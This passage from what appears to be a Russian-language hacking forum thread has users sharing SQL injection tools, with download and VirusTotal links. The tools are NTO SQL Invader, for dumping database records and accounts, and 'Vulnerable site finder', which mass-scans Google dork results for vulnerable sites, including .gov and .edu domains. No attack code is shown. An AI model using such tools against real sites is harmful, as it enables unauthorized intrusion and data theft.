    http://www.virustotal.com/file-scan/report.html?id=198ca5aa01185322588c0653dfe71ec4ea6b15b057ec21a320e26b1f980f04b1-1323456012
     
  18. 0xN00B

    0xN00B New Member

    Joined:
    30 Nov 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    NTO SQL Invader

    [​IMG]

    Описание (оригинал):
    NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, you will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database.
    Easy to use - The tool’s GUI interface enables you to simply paste the injectable request found by a DAST tool or feed a detailed request straignt from an application scan report. You can then control how much information is harvested.
    Clearly presents evidence - Unlike tools that provide all data via command line, NTO SQL Invader provides the data in a organized manner that is useful for both executive meetings as well as technical analysis and remediation.
    Enables easy transport of logging data - All of the data harvested from NTO SQL Invader can be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or POC.

    В общем еще 1 программа для раскрутки SQL Injection. Может кому будет полезна.

    Официальный сайт программы: NTObjectives

    Скачать: NTO SQL Invader
     
  19. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    294
    Likes Received:
    26
    Reputations:
    11
    Vulnerable site finder v1.1

    Vulnerable site finder v1.1
    [​IMG]

    Code:
    Hey CHF
    
    Here is my latest tool "Exploit Scanner Tool" witch will allow you to search google for links then
    scan them links for vulnerabilities.
    
    After a pretty successful release of the beta version of "Vulnerable site finder beta" i made a new version "v1.1"
    
    New features:
    
    - Faster scanning
    - Site domains Eg .gov .edu
    - Progress bar bug fixed
    - Import urls list
    - Export links before and after scanning them


    Видео по работе
    [​IMG]


    scan :
    https://www.virustotal.com/file/b2c171f32e7a50413303f931d415471fbb7e43ad3ebcb5b36647ec46b68b2a15/analysis/1328461692/

    download at:
    http://gartland1.co.uk/?p=104
    http://www.sendspace.com/file/y3zlll
    http://upwap.ru/2035282
    http://keep2.me/fd34336
     
    #19 alextrust, 18 Feb 2012
    Last edited: 20 Feb 2012
  20. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    294
    Likes Received:
    26
    Reputations:
    11
    Vulnerable site finder v1.2 (SQLi Scanner)
    [​IMG]

    Code:
    Hey CHF[/CENTER]
    
    [CODE]- Faster scanning
    - Site domains Eg .gov .edu
    - Progress bar bug fixed
    - Import urls list
    - Export links before and after scanning them
    - Custon error’s
    - Custom site’s
    - Updater
    - No scan limit
    - Comes with 10k + dorks 
    
    Code:
    VT
    https://www.virustotal.com/file/c98a2e90c436f86daf363561751b8cf69536852d5682861bd0b26204ff357d1b/analysis/1328897424/
    http://www.mediafire.com/?mzdkw9onbbwu05b
     
    1 person likes this.
Loading...